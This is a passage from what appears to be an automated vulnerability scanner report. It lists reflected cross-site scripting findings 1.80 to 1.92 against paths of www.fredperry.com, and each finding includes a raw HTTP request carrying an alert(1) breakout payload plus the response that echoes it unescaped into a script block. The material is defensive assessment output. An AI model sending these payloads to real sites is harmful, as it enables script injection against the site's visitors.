This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb1808"-alert(1)-"761be49e7f3/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r7of708qtgn1vt8bnn8uboqkk2; expires=Tue, 09-Nov-2010 17:05:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb1808"-alert(1)-"761be49e7f3/men/");
//]]>
...[SNIP]...

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 988e5"-alert(1)-"b11ab3c0675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men988e5"-alert(1)-"b11ab3c0675/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hu1d1s8la6ui695fjj2imvb9n5; expires=Tue, 09-Nov-2010 17:06:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men988e5"-alert(1)-"b11ab3c0675/");
//]]>
...[SNIP]...

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64480"-alert(1)-"2f0f4002ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ooj8qcigou1hp2bm63imobtkt0; expires=Tue, 09-Nov-2010 17:05:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's L
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1");
//]]>
...[SNIP]...

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aebc"-alert(1)-"8415b8659b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t572mchn82lsgdjpraivc9hmj7; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/");
//]]>
...[SNIP]...

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1880"-alert(1)-"89b8cefdcb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l7gmp8pmt6tvlpnvuprf1qioh3; expires=Tue, 09-Nov-2010 17:14:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/");
//]]>
...[SNIP]...

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bdf6"-alert(1)-"0c2e6e325d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5ou6pdoglafg1dha16j5t94qk7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/");
//]]>
...[SNIP]...

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af85e"-alert(1)-"f0ac6225e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lphu3bnnj344ar3vk8j04vjlo7; expires=Tue, 09-Nov-2010 17:12:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1");
//]]>
...[SNIP]...

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7520f"-alert(1)-"65db163a491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition7520f"-alert(1)-"65db163a491/men/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fba8t0ar5ln3ls253ccb9o12v2; expires=Tue, 09-Nov-2010 17:11:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7520f"-alert(1)-"65db163a491/men/bags/");
//]]>
...[SNIP]...

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ca63"-alert(1)-"8f92cbce3aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28bt0rb15rjl4hvgp96soe7p70; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/");
//]]>
...[SNIP]...

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22869"-alert(1)-"2f8729c9de1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sc9er4klh7tb3b5pk845ru3dh5; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/");
//]]>
...[SNIP]...

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccefc"-alert(1)-"09f5c581780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rle2pg95m5vgh1oepgfpgeku56; expires=Tue, 09-Nov-2010 17:10:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1");
//]]>
...[SNIP]...

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87410"-alert(1)-"642ea0df71f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=65n5cjmvruquljc1oa0u0lpv05; expires=Tue, 09-Nov-2010 17:09:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bd9e"-alert(1)-"67a1afe9718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ge5scm29ad71fdltcr1kh3vfe2; expires=Tue, 09-Nov-2010 17:10:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2afe3"-alert(1)-"17e2dabd41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

